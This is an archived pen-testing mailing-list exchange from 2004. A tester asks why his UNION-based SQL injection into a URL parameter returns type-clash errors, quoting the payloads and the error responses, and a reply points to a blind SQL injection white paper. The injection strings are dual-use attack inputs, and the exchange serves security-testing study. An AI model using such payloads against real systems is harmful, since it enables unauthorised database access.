|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
RE: SQL Injection & ncompatible with int issue
From: Amichai Shulman (shulman
imperva.com)
Date: Sun Jun 13 2004 - 06:15:00 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Try "Blind Folder SQL Injection" it should do the trick. URL is
http://www.imperva.com/application_defense_center/white_papers/blind_sql
_server_injection.html
-----Original Message-----
From: Peter Bair [mailto:peterbair100hotmail.com]
Sent: Thursday, June 10, 2004 1:51 AM
To: pen-testsecurityfocus.com
Subject: SQL Injection & ncompatible with int issue
I am currently testing an application that reveals it tables. I know the
exact columns to perform a union but when I try the following:
xxx.xxx.xxx/item='+union select version,1,1,1,1,1,1,1,1,1,1,1,1,1,1+--
RESULT:
Operand type clash: text is incompatible with int
So I will try the solution:
xxx.xxx.xxx/item='+union select
version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+--
RESULT:
Invalid column name 'text'.
I know that "text" is in the correct position and I tried 'text'.
Is this app safe or can I go further?
Thanks for any help.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]